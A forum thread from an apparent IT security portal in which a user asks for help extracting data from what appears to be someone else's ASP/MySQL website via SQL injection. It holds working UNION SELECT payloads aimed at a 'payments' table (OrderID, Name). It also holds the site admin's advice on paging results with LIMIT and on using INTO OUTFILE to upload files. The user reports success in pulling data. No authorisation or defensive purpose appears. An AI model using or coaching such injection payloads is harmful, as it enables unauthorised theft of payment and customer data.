 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Hlep me query in sql injection |
 |
 Posted: Sat Mar 21, 2009 6:57 pm |
 |
|
| ukzz |
| Regular user |
 |
|
| Joined: Feb 05, 2009 |
| Posts: 22 |
|
|
|
 |
|
 |
|
I have a asp site use mysql data
I can get comlun , table in normal
But when i try to get data
-1' union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,OrderID,45,46,47,48,49,50 from payments+/*
I cant get
It's show 2 error:
IIS ASP max request time out
Or
Microsoft OLE DB Provider for ODBC Drivers error '80040e31'
[MySQL][ODBC 3.51 Driver][mysqld-5.0.19-nt]MySQL client ran out of memory
I tried used where exp but still this error
Any one can help me query ? |
|
|
|
|
| Posted: Sat Mar 21, 2009 7:09 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Use LIMIT, for example "LIMIT 0,100". Without limiting it's too much data for database and/or webserver and thus the errors. |
|
|
|
|
| Posted: Sat Mar 21, 2009 7:34 pm |
|
|
| ukzz |
| Regular user |
|
|
| Joined: Feb 05, 2009 |
| Posts: 22 |
|
|
|
|
|
|
|
thanks waraxe for answer
But can u tell me details
Cause i dont know limit syntax:( |
|
|
|
|
|
|
|
|
| Posted: Sat Mar 21, 2009 7:47 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
http://dev.mysql.com/doc/refman/5.0/en/select.html
| Code: |
The LIMIT clause can be used to constrain the number of rows returned by the SELECT statement. LIMIT takes one or two numeric arguments, which must both be non-negative integer constants (except when using prepared statements).
With two arguments, the first argument specifies the offset of the first row to return, and the second specifies the maximum number of rows to return. The offset of the initial row is 0 (not 1):
SELECT * FROM tbl LIMIT 5,10; # Retrieve rows 6-15
To retrieve all rows from a certain offset up to the end of the result set, you can use some large number for the second parameter. This statement retrieves all rows from the 96th row to the last:
SELECT * FROM tbl LIMIT 95,18446744073709551615;
With one argument, the value specifies the number of rows to return from the beginning of the result set:
SELECT * FROM tbl LIMIT 5; # Retrieve first 5 rows
In other words, LIMIT row_count is equivalent to LIMIT 0, row_count.
|
Basically you just add that LIMIT stuff to the end of the query  |
|
|
|
|
|
|
|
|
| Posted: Sat Mar 21, 2009 8:03 pm |
|
|
| ukzz |
| Regular user |
|
|
| Joined: Feb 05, 2009 |
| Posts: 22 |
|
|
|
|
|
|
|
thanks waraxe , i can get data now
but....
-1' union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,Name,49,50 from payments limit 5--+/* >> it's ok
union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,OrderID,49,50 from payments limit 5--+/* >> it's show ???????
I cant get any data like number , all of them show ???
what can i do?
Can i upload via sql ? |
|
|
|
|
| Posted: Sat Mar 21, 2009 9:01 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
First 100 rows:
Next 100 rows:
Next 100 rows:
About uplaod via sql - there is mysql feature called "INSERT INTO OUTFILE", but it needs FILE privilege and in most real-world scenarios you don't have it. |
|
|
|
|
| Posted: Sun Mar 22, 2009 10:57 am |
|
|
| ukzz |
| Regular user |
|
|
| Joined: Feb 05, 2009 |
| Posts: 22 |
|
|
|
|
|
|
|
i tried but maybe no luck
[MySQL][ODBC 3.51 Driver][mysqld-5.0.19-nt]Access denied for user 'pds'@'172.16.xxx.%' (using password: YES)
But thanks for waraxe with usefull post.
Do u have Yahoo chat?
I want to chat with u and donate something for forums.
Can u pm me your YIM./ |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 71
Members: 0
Total: 71
